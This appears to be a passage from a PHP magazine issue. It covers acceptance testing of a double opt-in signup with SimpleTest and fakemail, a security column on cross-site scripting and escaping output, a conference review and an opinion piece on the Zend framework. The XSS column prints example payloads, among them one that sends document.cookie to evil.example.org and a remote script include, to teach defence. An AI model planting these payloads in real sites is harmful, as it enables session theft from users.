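            list($key, $value) = explode('=', $line, 2);
            $this->settings[trim($key)] = trim($value);
        }
    }

    public function get($key)
    {
        return isset($this->settings[$key]) ? $this->settings[$key] : null;
    }

    public function isLive()
    {
        return $this->live;
    }
}

// Demonstration with throwaway files in the system temp directory.
$dir = sys_get_temp_dir() . '/config_demo_' . uniqid();
mkdir($dir);
file_put_contents("$dir/live", "home=http://www.example.com/index.php\n");
file_put_contents("$dir/test", "home=http://uno/sandbox/index.php\n");

$configuration = new Configuration($dir);
echo $configuration->get('home'), "\n";   // the value from the "test" file
```

Because the application and the tests both go through the same class, dropping a "test" file next to the application is enough to redirect every resource that is looked up this way.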
Testing a Double Opt-in
This is a nice example, because it’s so nasty. When a user signs up they are entered into the database only as a pending user. To complete registration, they must click on a link that is mailed to them. This confirms that their e-mail address is genuine and that they haven’t been signed up by a malicious third party.

What makes it so nasty? The test code injects a user into the database for a start; also, it sends out e-mails on every test run. We want to start with a clean database, because if a user is already signed up, the test will pass for the wrong reasons. Not only that, we want to test pages from our own development machine, not the current version on the live server. This means even the home page URL will be different depending on our environment. Faced with all these difficulties, some developers will give up and drop back into the evil ways of manual testing.

Don’t panic. It’s not as bad as it sounds. Let’s tackle it one step at a time. First, we need a configuration system that we can override. A quick and dirty solution is the code in Listing 2. If there is a configuration file called “test” then that is the one used, otherwise it uses a file called “live”. This allows us to place a temporary test version in place, even on a live server.

In our development sandbox we now create a “test” configuration file with...
home=http://uno/sandbox/index.php
uno is my development machine, and a faithful friend. Remember that home() method call in the web test case snippet above? We can now flesh it out...
class RegistrationTest extends WebTestCase {
    function home() {
        $configuration = new Configuration();
        return $configuration->get('home');
    }
    ...
}

I am going to fill the test case out piece by piece. I am not going to fill out the application code except for the various utilities we need for testability. You will have to use your imagination for this part. After all, our requirements come before the implementation, and so for an acceptance test we won’t have written application code yet anyway. Pulling resources from a live site by mistake is a favorite accident. You think you are testing the code on your own box, yet whatever you do, the test keeps failing. Right around this time, customer services start to complain about all of these false sign-ups they are suddenly getting. Thus, every URL you use should check the configuration to make the application and tests safe. Also, avoid hard coding anchor tags in pages. Use relative paths. Otherwise you can click() yourself to a live server by mistake. We are now testing pages only on our development box, but are we creating a user?

[FIGURE 1: diagram connecting Database, Mailer, UserFinder and Configuration to the «file» test and «file» live configurations, and on to the database, sendmail, and the «fake» fakemail and database.]

Nuke the Database
The first task is to make sure that any database connections are set up only via the configuration. This should be the case anyway, so we’ll assume that this is already true. We modify our test configuration to look like this:
home=http://uno/sandbox/index.php
database_user=me
database_password=secret
database_host=localhost
database_name=sandbox
The important entry here is “database_name”. You want to avoid hard-coded database names in applications, as you may be testing on a machine which is also acting as a live server. Because the other parameters would have to match, the only variable that’s really important is the database name. Most testing tools have a mechanism for running code before and after each test. SimpleTest is no exception, and has the setUp() and tearDown() methods for this. Imagination time. We’ll pretend that all of the database activity is hidden behind a simple class, called Database, that manages the schema and initial data. That class has clear() and build() methods to reset the system to its empty state. Let’s modify the test case...
class RegistrationTest extends WebTestCase {
    ...
    function setUp() {
        $configuration = new Configuration();
        if ($configuration->isLive()) {
            die('About to delete all data');
        }
        $database = new Database();
        $database->clear();
        $database->build();
    }
}
I’m not kidding. I really do want to destroy and rebuild the database on each and every test. I don’t want test interference. So far, we only have one test, but as soon as we add more, we could leave stray data in the system, and this could cause spurious failures in later tests. It’s the 100% rule again. I want 100% reliability for my tests or they are useless. With a baseline established we can write some more test code…
class RegistrationTest extends WebTestCase {
    ...
    function testHappyPath() {
        ...
        $this->assertText('A mail has been sent');
        $finder = new UserFinder();
        $user = $finder->findByName('me');
        $this->assertTrue($user->isPending());
    }
}
Frankly, I am not entirely happy with this. Application code has slipped into an acceptance test. If I were really being black box, I would log in to the administration interface using the browser and check that the user was listed in the web pages. However, there is a problem with this purist approach: I would have to write a lot of the application just to get the test running. For the test to be useful, you want it to protect you from the earliest opportunity. If it can only pass at the end of the project, then it’s not pulling its weight. It’s a delicate balance though, and I would probably go back and make this code truly black box once the administration code was up and running. I am that fanatical. Now, this test will only pass if the application actually creates a user. What about that e-mail?
Goodbye Sendmail
One way of capturing the mail would be to send it to a local POP account. We can actually rule this option out straight away. Besides everything running rather slowly and the need to constantly clear the POP account, it would put you at the mercy of mail server configuration. This is beyond most developers at the best of times, but on a live system the security of the mail server should be extreme. It’s unlikely you would be able to fire test e-mails through it from your development boxes. Additionally, if the configuration changes, your tests will fail for the wrong reason. Part of our objective is to isolate our tests from this kind of failure. The solution is much simpler if we can intercept the mail before it even leaves the machine. E-mail is transferred using something called an MTA, or Mail Transfer Agent. An example MTA is the ferociously complicated “sendmail”. The MTA listens on a port, usually 25, and awaits a list of standard text instructions to send a mail. If we can replace the MTA with a simpler one, one that just saves the message as a file, things get a lot easier to test. “Fakemail” is just such a replacement MTA. It’s a simple Perl script that can be downloaded from Sourceforge (http://sf.net/projects/fakemail). When run, it listens on a designated port until killed. If asked to send a mail to, say, “fred@anywhere”, it will instead save the first message and headers as a file named after that address with “.1” appended. We can start it from within a test case like so...
class RegistrationTest extends WebTestCase {
    ...
    function startFakemail() {
        $configuration = new Configuration();
        $host = $configuration->get('mail_host');
        $port = $configuration->get('mail_port');
        $command = "fakemail --path=../temp " .
                "--host=$host --port=$port " .
                "--background";
        $this->_pid = `$command`;
    }
}
In order, this tells fakemail to save the mails to the “temp” directory, use the host and port from the configuration, and run as a daemon. When run as a daemon it simply returns its process ID, which we’ll need in order to stop it...
class RegistrationTest extends WebTestCase {
    ...
    function stopFakemail() {
        $command = 'kill ' . $this->_pid;
        `$command`;
    }
}
We can call these methods either at the start and end of our test method or, if we need fakemail for several tests, in the setUp() and tearDown() methods. Next, we add this information to our configuration file...
home=http://uno/sandbox/index.php
database_user=me
database_password=secret
database_host=localhost
database_name=sandbox
mail_host=localhost
mail_port=10025
There is a hitch here. Ideally we would like to use port 25 for fakemail, but it’s likely that another MTA is already using that port. Not only that, but on a Unix system, only the root user is allowed to attach to ports below 1024. Unfortunately, by using a different port we inflict some extra work on ourselves. Our application must be able to select a port from the same configuration as the test. If we’ve used the PHP mail() function in our application, we are in trouble. You cannot select an arbitrary port at run time with this function. To get around this, Listing 3 contains a drop-in mail() replacement. It uses the “phpmailer” library (http://phpmailer.sf.net) to send the mail commands.
Worst Case?
The final test case is shown in Listing 4, and the different connections are shown in Figure 1. The test is a little long, but we can easily factor it down if we are testing similar features in other test cases. More importantly, we have had to add several hooks into the application to make it testable at all. That’s a small but noticeable amount of work. Now, a double opt-in is especially tricky, but there are other awkward cases too. Payment gateways and other network resources are good examples. Is all this extra work worth it? In my experience the answer has always been “yes.” The most powerful features of this approach are precise requirements from the start, fast project sign-off, reduced documentation and constant quality assurance. I can tell that the code is working with a single click of the mouse.
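The step in the final test case that follows the link in the captured mail depends on pulling a URL out of the saved message. The sketch below shows one way this might be done; the function name first_link_in_mail(), the pattern, and the sample message are all assumptions for illustration and are not taken from the article's listing.

```php
<?php
// Hypothetical helper: return the first http(s) URL found in a saved mail, or null.
function first_link_in_mail(string $mail): ?string
{
    // Stop at whitespace, quotes and angle brackets so HTML attributes are not swallowed.
    if (preg_match('~https?://[^\s"\'<>]+~', $mail, $matches)) {
        return $matches[0];
    }
    return null;
}

// Made-up message in the shape a captured confirmation mail might take.
$mail = "To: me@home\r\n"
      . "Subject: Please confirm your registration\r\n"
      . "\r\n"
      . "Click <a href=\"http://uno/sandbox/confirm.php?token=abc123\">here</a> to confirm.\r\n";

$url = first_link_in_mail($mail);
```

In a web test case, the returned URL would be handed to get() so that the test continues exactly where a real user clicking the link would.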
Tools
Disclaimer: I had major parts in the writing of both SimpleTest and fakemail. For unit testing, PHPUnit (PEAR) and “phpt” (built in to PHP) are the main alternatives to SimpleTest. PHPUnit is due to add MockObject support. Soon? SimpleTest is currently the lightest way to test web pages in PHP. It doesn’t handle JavaScript though, so you may want to look at Selenium (JavaScript), JWebUnit (Java), Canoo (XML) or Watir (Ruby). You cannot embed PHP code in these, so you will need special pages to accomplish such things as database clearance. Alternately, you can try to script Microsoft Internet Explorer with OLE automation. I haven’t yet seen an alternative to fakemail, although one shouldn’t be difficult to write. With fakemail you end up with a couple of Perl CPAN dependencies.
MARCUS BAKER works at Wordtracker as a Technical Consultant, where his responsibilities include the development of applications for mining Internet search engine data (www.wordtracker.com). Based in London, he is a regular contributor to Sitepoint forums (www.sitepoint.com). His previous work includes telephony and robotics. Marcus is the lead developer of the SimpleTest project, which is available on Sourceforge. He’s also a big fan of eXtreme programming, which he has been practising for about two years.
Cross Site Scripting
SECURITY CORNER
Cross-Site Scripting
Cross-Site Scripting (XSS) has become one of the most prevalent web application security vulnerabilities today. With the growing popularity of Ajax, XSS attacks are more advanced and dangerous than ever. This article introduces cross-site scripting, including its history, common and emerging attacks, and effective safeguards.
by CHRIS SHIFLETT
“Cross-site scripting” doesn’t accurately describe the vulnerability, because this name refers to an old exploit. This is a common problem within the security community, because many advances in the field are a result of new attacks being discovered. Because a vulnerability is unknown until someone discovers an attack that exploits it, this is hardly surprising. The attack gets named, and then all attacks that exploit the same vulnerability are given the same name.
The original XSS exploit involved the use of frames, a feature rarely used today. By using a frameset, one was able to include content from other domains (sites), and JavaScript within one frame was able to cross web site boundaries to access content from another frame. The most common XSS attacks today don’t do anything cross-site, and this continues to be a cause of some confusion. Even some security professionals have been known to shun the XSS label when an attack only involves a single site.
The Vulnerability
XSS exists whenever tainted data is allowed to enter the context of HTML without being properly escaped. Stated differently, when a PHP script outputs data that has neither been filtered nor escaped, it is definitely vulnerable to XSS. This is an easy mistake to make, and the following example demonstrates the vulnerability:
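A minimal sketch of the kind of script described here, assuming a form field named username (the name used in the discussion that follows). The helper function and the simulated request array are illustrative assumptions; a real script would read $_POST directly.

```php
<?php
// Hypothetical helper, deliberately vulnerable, for illustration only.
function render_welcome_unsafe(array $post): string
{
    // Tainted data enters the HTML context neither filtered nor escaped.
    return "<p>Welcome, {$post['username']}.</p>";
}

// Simulated request data standing in for $_POST.
$post = ['username' => "<script>alert('XSS')</script>"];

// The submitted markup reaches the page unchanged, so a browser would run it.
echo render_welcome_unsafe($post), "\n";
```

Whatever the visitor submits as username becomes part of the page itself, which is the whole of the vulnerability.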
TO DISCUSS THIS ARTICLE VISIT: http://forum.phparch.com/268
Although this is an extreme example, it is hopefully clear that $_POST['username'] is just one (albeit obvious) example of tainted data. Sometimes, especially without a solid design, it is difficult to determine whether the data in a particular variable is tainted. Some describe XSS as an input filtering problem. This isn’t entirely accurate, but it’s easy to see how people reach this conclusion. Consider the use of input filtering as protection:
Welcome, {$clean['username']}."; ?>
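A minimal sketch of input filtering used this way. The text states only that the username ends up guaranteed to be alphanumeric, so the use of ctype_alnum() as the filter, and the helper function around it, are assumptions; the $clean array follows the naming in the fragment above.

```php
<?php
// Hypothetical filter: returns the username only if it is purely alphanumeric.
function filter_username(array $post): ?string
{
    $username = $post['username'] ?? '';
    // ctype_alnum() is false for the empty string and for any character
    // other than letters and digits.
    return (is_string($username) && ctype_alnum($username)) ? $username : null;
}

$clean = [];  // holds only data that has passed filtering
$name = filter_username(['username' => 'chris42']);  // simulated $_POST
if ($name !== null) {
    $clean['username'] = $name;
    echo "<p>Welcome, {$clean['username']}.</p>\n";
}
```

Nothing here escapes the value; the output is safe only because the filter happens to exclude every character that is special in HTML.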
If the username is guaranteed to be alphanumeric, then it is safe to be used in the context of HTML. However, this technique addresses the symptom rather than the root cause of the problem. It’s not always possible to eliminate XSS vulnerabilities with filtering alone; it is a coincidental situation that can exist, but it is not guaranteed. Sometimes, input filtering rules must be very relaxed to accommodate all valid data, and therefore not all valid data can be safely used in the context of HTML.
The real solution to the XSS problem requires developers to understand context. In PHP, we can safely store any data in a variable, even binary data. Once that data enters another context, such as HTML, it is important to ensure that it is treated only as data.
Note: Understanding context is a topic worthy of its own column. Stay tuned.
The Exploits
There are an infinite number of XSS exploits, because the only limitations are those that naturally exist on the client side (and client-side scripting is becoming more and more powerful as browsers advance). I am often disappointed by the number of developers who do not appreciate the dangers that XSS presents. However, I do understand why many have doubts: example exploits are often benign. Security experts don’t want to provide dangerous exploits for fear that they will be misused. One of the most common examples is to attempt to open an alert box:
<script>alert('XSS')</script>
This is hardly a reason to worry, but it effectively identifies a vulnerability. Once a vulnerability is discovered, the possibilities are endless. There are many variants of this benign attack, and some try to guess the specific context in which the data is used. For example, consider a form that repopulates itself whenever there is an error:
There was an error processing the form. Please try again.
Because this approach is so popular, another simple XSS test is to try the following:
"><script>alert('XSS')</script>
If provided as the name in the previous example, the form element is redisplayed as follows:
Name: <script>alert('XSS')</script>
By correctly guessing the context of the data (it is the value attribute of the form element), an attacker can successfully exploit the form. Traditionally, malicious XSS exploits have been used to steal cookies, because document.cookie can be read and subsequently sent to a remote site using a variety of methods. For example, one such attack is to use XSS as a platform from which to launch a cross-site request forgery (CSRF) attack:
<script>document.write('<img src="http://evil.example.org/steal.php?cookies=' + document.cookie + '" />')</script>
If this JavaScript is present in a page on your web site (a possibility that XSS vulnerabilities yield), document.cookie contains cookies associated with your site, and the victim’s browser sends a request to evil.example.org that includes these cookies. The steal.php script conveniently uses $_GET['cookies'] to access them. When an attack is too long (perhaps the application truncates the data), attackers can try to reference the malicious code instead, relying on the browser to fetch it:
<script src="http://evil.example.org/evil.js"></script>
There are numerous other examples and test cases provided in the XSS Cheatsheet: http://ha.ckers.org/xss.html
Emerging attacks are beginning to make use of new advances in client-side scripting, notably Ajax techniques. The most famous of these new attacks is the MySpace worm, which infected more than a million accounts before being stopped. Although the viral nature of the worm was the result of a CSRF attack, it was XSS that provided the initial opening and made the worm possible. What makes the MySpace worm particularly frightening is that the use of XMLHttpRequest provides a way around the traditional CSRF protection of using a token in a form, as described here: http://shiflett.org/articles/security-corner-dec2004
As the number of people well-versed in client-side technologies continues to increase, we are sure to see more and more creative XSS attacks emerge.
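Returning to the repopulating form discussed earlier in this section, the following is a minimal PHP sketch of how the "> test string breaks out of the value attribute, shown next to the same field with its value escaped (the technique covered under The Safeguards). The function names and the field name "name" are assumptions made for illustration, not the original listing.

```php
<?php
// Hypothetical renderers for a single form field.
function render_name_field_unsafe(string $name): string
{
    // The submitted value is placed inside the attribute untouched.
    return '<input type="text" name="name" value="' . $name . '" />';
}

function render_name_field_escaped(string $name): string
{
    // ENT_QUOTES converts both double and single quotes, so the value
    // cannot close the attribute it sits in.
    $html = htmlentities($name, ENT_QUOTES, 'UTF-8');
    return '<input type="text" name="name" value="' . $html . '" />';
}

$payload = '"><script>alert(\'XSS\')</script>';

// The leading "> closes the attribute and the tag, freeing the script.
echo render_name_field_unsafe($payload), "\n";
// Escaped, the same string stays inside the attribute as plain data.
echo render_name_field_escaped($payload), "\n";
```

In the first line of output the script element sits outside the input tag; in the second, every special character has become an entity and the browser displays the string in the field instead of running it.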
The Safeguards
You should always filter input, but protecting against XSS requires addressing the root cause of the problem: in the context of HTML, anything you want to be considered data needs to be escaped to ensure that it is so. For example, given $name and $location, the following demonstrates how this data can enter a new context:
$name is from $location."; ?>
You might be wondering why PHP can’t escape these values automatically for you. The reason is that it can’t predict your intentions. After all, you might have HTML tags within $name and $location that you intend to be interpreted by the browser:
<?php $name = "<b>$first_name $last_name</b>"; $location = "$city, $state"; ?>
Only you can really know what you expect to be data (and nothing but data). Whatever your approach, you need to remember to escape the data that you want to preserve. For example, in the previous example, $first_name and $last_name are data, but the HTML bold tags that surround them are not. Therefore, both $first_name and $last_name should be escaped. Escaping is a technique intended to preserve data as it enters a new context. When data leaves your application, it enters a new context, and this is why I frequently simplify this rule to “escape output.” Because this month’s topic is XSS, the context in question is HTML, and there is a simple function to escape data you want to preserve in the context of HTML:
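A minimal sketch of this rule applied to the name and location example, assuming htmlentities() is the function meant (htmlspecialchars() is a narrower alternative). The wrapper name e() and the sample values are illustrative assumptions.

```php
<?php
// Hypothetical shorthand for escaping data entering the HTML context.
function e(string $data): string
{
    return htmlentities($data, ENT_QUOTES, 'UTF-8');
}

// Sample values standing in for tainted data.
$first_name = 'Ada';
$last_name  = '<i>Lovelace</i>';
$city       = 'Ann Arbor';
$state      = 'MI';

// The <b> tags are markup we intend; the names are data, so they are escaped.
$name     = '<b>' . e($first_name) . ' ' . e($last_name) . '</b>';
$location = e($city) . ', ' . e($state);

echo "<p>$name is from $location.</p>\n";
```

The bold tags reach the browser as markup, while the italic tags hidden in the last name are displayed literally rather than interpreted.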
Naming conventions (like the use of $html demonstrated here) can help you keep up with data that can be safely used in another context:
Welcome, {$html['username']}."; ?>
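One way the convention might look end to end is sketched below: filtered data lives in $clean, data escaped for HTML lives in $html, and only $html is ever output. The deliberately relaxed filter (any non-empty string up to 32 bytes), the guest fallback, and the function name are assumptions for illustration.

```php
<?php
// Hypothetical flow: filter into $clean, escape into $html, then output.
function welcome(array $post): string
{
    $clean = [];  // data that has passed input filtering
    $html  = [];  // data that has been escaped for the HTML context

    $username = $post['username'] ?? '';
    // Relaxed filter (an assumption): any non-empty string up to 32 bytes.
    if (is_string($username) && $username !== '' && strlen($username) <= 32) {
        $clean['username'] = $username;
    }

    if (!isset($clean['username'])) {
        return '<p>Welcome, guest.</p>';
    }

    $html['username'] = htmlentities($clean['username'], ENT_QUOTES, 'UTF-8');
    return "<p>Welcome, {$html['username']}.</p>";
}

echo welcome(['username' => "O'Reilly <admin>"]), "\n";
```

The filter here lets quotes and angle brackets through, which a relaxed rule may have to do; the output is still safe because the value is escaped before it enters the HTML.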
The purpose of escaping is to preserve data in a different context, so data that can cause damage once it has been escaped should never exist. Therefore, escaping alone offers sufficient protection against XSS. Resist the temptation to consider input filtering to be the solution to XSS. As I mentioned previously, your filtering rules might need to be so relaxed that they cannot offer adequate protection. Filtering your input helps ensure data integrity and can increase the reliability and predictability of your applications (all good things), but it does not address the root cause of XSS. However, I do strongly recommend adhering to both practices, and input filtering offers strong protection against many other types of security vulnerabilities. It can also be considered a Defense in Depth mechanism.
Until Next Time...
I hope this article helps you appreciate the danger that XSS presents as well as the importance and purpose of escaping. Protecting your applications from XSS attacks requires a few very simple steps, notably escaping your output and employing the use of a naming convention (or similar approach) that can help you reliably distinguish between escaped and unescaped data. Until next month, be safe.
CHRIS SHIFLETT is an internationally recognized expert in the field of PHP security and the founder and President of Brain Bulb, a PHP consultancy that offers a variety of services to clients around the world. Chris is a leader in the PHP community, and his involvement includes being the founder of the PHP Security Consortium, the founder of PHPCommunity.org, a member of the Zend PHP Advisory Board, and an author of the Zend PHP Certification. A prolific writer, Chris has regular columns in both PHP Magazine and php|architect. He is also the author of HTTP Developer’s Handbook (Sams) as well as the highly acclaimed Essential PHP Security (O’Reilly). You can contact him at [email protected] or visit his web site and blog at http://shiflett.org/.
SPECIAL FEATURE | REVIEW & ANALYSIS
CONFERENCE COVERAGE
Loyal readers of my product reviews will know that although I work for this magazine, I will always try to be honest, and if criticisms are leveled they are for the betterment of others and not meant to offend. Having voiced my little disclaimer, I am very happy to be able to review the php|works conference recently held in Toronto, Canada. This conference really had all that any PHP programmer could want, except maybe a trade show floor with display booths for companies to show their wares and the visitors to get swag; but I digress.
There were 3 keynote talks at this conference, which were great. Two were given by Rasmus Lerdorf (the original mind behind PHP) and one (the closing keynote) was by Marco Tabini. Marco, of course, is the President of MTA, and the publisher of this magazine. All of the keynotes were informative and interesting to attend. One of the keynotes that Rasmus presented was on XSS (cross site scripting), and how to defend a site against such attacks. It was very interesting to see how many ways a web site can be attacked by those who know how, and even more valuable to be shown how to defend a site against such attacks. Mr. Lerdorf also took a few website addresses from the audience and ran them through a tool that he developed to detect XSS vulnerabilities.
Besides the keynotes, there were many sessions to attend that were geared toward both the web developer and the PHP developer. Sessions covered a broad range: an introduction to PHP, Multilingual Flash, Advanced PHP security, cross browser web design, extension writing basics, a regular expressions clinic, and coverage of PDO (PHP’s new Data Objects solution); and that is just to name a few. As you can see, there were topics here for everyone from the beginner to the advanced. This is a sign of a well thought out and delivered conference.
I have included some pictures of events that took place during the conference. The first is a picture of Rasmus receiving a framed CD of all the versions of PHP that were released over the last 10 years. Since this is the 10th anniversary of PHP, it was thought a fitting gesture to give this to the language’s inventor. I want to thank Derick Rethans (who was incidentally also one of the speakers) for graciously supplying a few of these pictures, as my camera was still in its holder a few times when it shouldn’t have been.
[Photo: PHP creator Rasmus Lerdorf receiving a commemorative “10th Anniversary of PHP” plaque]
[Photo: Marco Tabini and Rasmus during the final keynote address]
[Photo: Wez Furlong on PHP Data Objects]
Peripherals
Many reviews of conferences don’t talk about the other peripheral things that are usually part of a conference stay and location. So, let’s discuss that. The location of the hotel was great: just across the street and a short walk from the subway, which takes about 15 minutes to get you downtown. Toronto is one of the biggest cities in North America, so there is a lot to do. During the week of the conference, for example, there were Major League baseball games (I got to attend one of them), there was an international film festival on, and U2 was in concert (I managed to get to this, too, along with 59,999 other people; U2 is an awesome live band), and of course there is the CN Tower, The Ontario Science Center, the National Hockey League Hall of Fame, the Eaton’s Shopping complex, and restaurants galore. I felt quite safe in this city too; as a small town person, I had no worries. The hotel itself (Holiday Inn Yorkdale) was very nice and the staff quite helpful when we were setting up the conference rooms and the registration desk, for example. The huge mall across the street topped it off for souvenir shopping. I couldn’t have asked for a better large city venue.
[Photo: George Schlossnagle during his Regex Clinic]
Summary
This was the first PHP conference that I have attended, so it is a little hard to compare it to others on the go. I do, however, have extensive conference experience, having attended and spoken at conferences in New Orleans, USA; Köln, Germany; and Melbourne, Australia. This certainly was up there with the others that I have attended.
Now for the criticisms (AKA the wish list): There are not too many complaints, really, and some of these points were gathered from other attendees with whom I was able to talk over lunch. I would have liked to see better abstracts of the sessions on the supporting web site so that attendees could better judge which sessions to attend (some abstracts were non-existent). It would also have been nice to have the sessions videotaped and to be able to buy a conference DVD, so that people could review the session information later at their own pace. Finally, it would have been nice to have some of the more popular sessions run more than once, so that if there were 2 or more popular sessions running at the same time, a person could attend the “live show” at another time.
Having said all the above, I certainly would recommend this conference to any PHP’er who is serious about their development work. Having a meeting of the minds like the speakers who were present is very rare indeed. Add to this the opportunity for attendees to take the Zend Certification Exam for free, and you have an excellent conference offering. Knowing the amount of work that is involved in a conference of this level makes me appreciate the work all that much more, as I was on the steering committee for the conferences in New Orleans that I mentioned earlier. My hat goes off to Marco and Arbi and the other unsung heroes of this conference. Hopefully I will see all of my new friends again next year!
[Photo: The audience during one of Rasmus’ keynote addresses]
[Photo: The speakers’ dinner]
[Photo: Our fearless editor-in-chief, Sean Coates]
PETER MACINTYRE lives and works in Prince Edward Island, Canada. He has been an editor with php|architect since September 2003. Peter is a Zend Certified Engineer. Peter’s web site is at http://www.paladin-bs.com.
exit(0);
It’s a Bird! It’s a Plane! It’s FUD!
by MARCO TABINI
One of the best things about being in the know for once is watching others squirm in their seats while they try to come up with an analysis for something about which they have absolutely no clue whatsoever. The signs that Zend was working on a new framework had been floating around for a while. Even though I was only asked to participate shortly before the public announcement, I had heard about the new project through the developer grapevine several weeks earlier (of course, that’s easy to say now that the cat is out of the bag, but that’s the beauty of gloating: it’s self-serving, very rewarding and virtually guilt-free).
I happened to read a few blog posts after the initial announcement (which, ironically, wasn’t confirmed by Zend until a few days later) and wasn’t surprised that the first people to react to it were those who had already been working on other frameworks. What surprised me, however, was how some of them, with absolutely no facts in hand, lashed out at Zend for, in their eyes, trying to destroy their creations with complete disregard for the community.
I don’t want to come across as a Zend apologist here. Even though I realize that they wanted to seize on the unique opportunity that their conference presented them to make a big splash with their announcement, I don’t think that it was wise to present the framework to the world with little more than some ideas and a smiling face.
My first reaction to the framework was a shrug, just like my first reaction to most of the other frameworks out there. The problem with frameworks is that they become too bloated almost from the very moment they start to exist. In the framework that we use internally for our projects, we have a firm rule: there cannot be more than three levels of inheritance. If we exceed that level, we have failed and we need to scrap whatever it was that we were working on and start over. This somewhat draconian rule keeps our framework shallow, which is the way I like it.
Shallowness translates into a framework that is lightweight and does not introduce an unreasonable level of bloat. In other words, the additional overhead introduced by the presence of the framework is balanced out by the advantages that we derive from its use in a way that we can live with. Of course, this means that the framework itself provides us with “limited” functionality; in fact, we aim at writing general-purpose classes that take care of about 70-75% of the work, leaving the remainder up to the developer to come up with. This is fine by me, as my experience has taught me that anything more than that causes the overhead to escalate geometrically in relation to the benefits (anything that starts with a base class called CObject belongs in university textbooks, not in the real world).
Two more aspects of a framework are particularly relevant to me: the presence of a testing harness and the consistency of the interfaces. The former is a clear must to ensure that the framework both behaves as advertised and can be upgraded in a clean way. The latter ensures that the contract between the framework and the end developer is not altered at some juncture, leaving one of the two end points out of sync.
Will the Zend framework deliver? It’s just too early to say. For sure, there are some smart people behind it (and, for once, I’m not talking about myself), and they’re all speaking the right language: simplicity, shallowness and proper development strategies. While things can always go awry, it’s good to see that they are progressing so rapidly and working hard at trying to build a nucleus upon which a larger group of people can improve.
Others have brought up the spectre of intellectual property rights, and how the Zend Framework will help address them. While this may matter to some of the larger implementers of PHP solutions (in other words, those who may sue each other for allegedly using their respective code), to the majority of the PHP community it will be, at most, a fringe benefit. Sure, it’s great to hear that SCO won’t take you to court any day soon, but if you’re a small fish they weren’t going to anyway.
The real benefit for the bottom of the pyramid is going to be in the fact that a commercially-backed open-source framework, while free, will inevitably attract customers who are ready to back their implementation with commercial support, thus allowing our community to grow, for once, in dollar signs as well as in Netcraft statistics.